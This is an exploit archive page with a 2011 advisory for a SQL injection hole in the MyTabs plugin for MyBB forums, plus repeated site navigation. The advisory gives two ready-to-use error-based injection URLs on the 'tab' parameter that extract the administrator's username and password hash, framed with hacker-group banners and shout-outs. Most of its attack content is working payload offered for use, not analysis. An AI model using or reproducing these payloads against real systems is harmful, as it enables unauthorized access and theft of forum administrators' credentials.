MyBB MyTabs SQL Injection

MyBB MyTabs SQL Injection: Posted Aug 2, 2011; Authored by dR.sqL, AutoRUN; MyBB MyTabs suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | f18c152cd26a147af425278fc655c37acf5fca20b7b0c6bd2224a57c6c268e2b; Download | Favorite | View

MyBB MyTabs SQL Injection

=====================================================================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
=====================================================================
 
# Exploit title :  MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Vulnerable Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !
 
Vulnerability :
 
$~ http://localhost/mybbpath/index.php?tab=[SQLi]
 
---------------------------------------
#           ~ Expl0itation ~            #
---------------------------------------
 
$~ Get the administrator's username (usually it has uid=1) ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
$~ Get the administrator's password ~
 
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
 
     _         _        ____  _   _ _   _                   _       _ ____              _    
    / \  _   _| |_ ___ |  _ \| | | | \ | |   __ _ _ __   __| |   __| |  _ \   ___  __ _| |   
   / _ \| | | | __/ _ \| |_) | | | |  \| |  / _` | '_ \ / _` |  / _` | |_) | / __|/ _` | |   
  / ___ \ |_| | |_ (_) |  _ <| |_| | |\  | | (_| | | | | (_| | | (_| |  _ < _\__ \ (_| | |___
 /_/   \_\__,_|\__\___/|_| \_\\___/|_| \_|  \__,_|_| |_|\__,_|  \__,_|_| \_(_)___/\__, |_____|
                                                                                     |_|     
 
 
 
# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.
 
 
 
  ____                      _   ____  ____       _    _ _                 _               _
 |  _ \ _ __ ___  _   _  __| | |___ \| __ )     / \  | | |__   __ _ _ __ (_) __ _ _ __   | |
 | |_) | '__/ _ \| | | |/ _` |   __) |  _ \    / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \  | |
 |  __/| | | (_) | |_| | (_| |  / __/| |_) |  / ___ \| | |_) | (_| | | | | | (_| | | | | |_|
 |_|   |_|  \___/ \__,_|\__,_| |_____|____/  /_/   \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)
                                                                                             
 
# 2011

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

MyBB MyTabs SQL Injection

MyBB MyTabs SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MyBB MyTabs SQL Injection

Share This

MyBB MyTabs SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems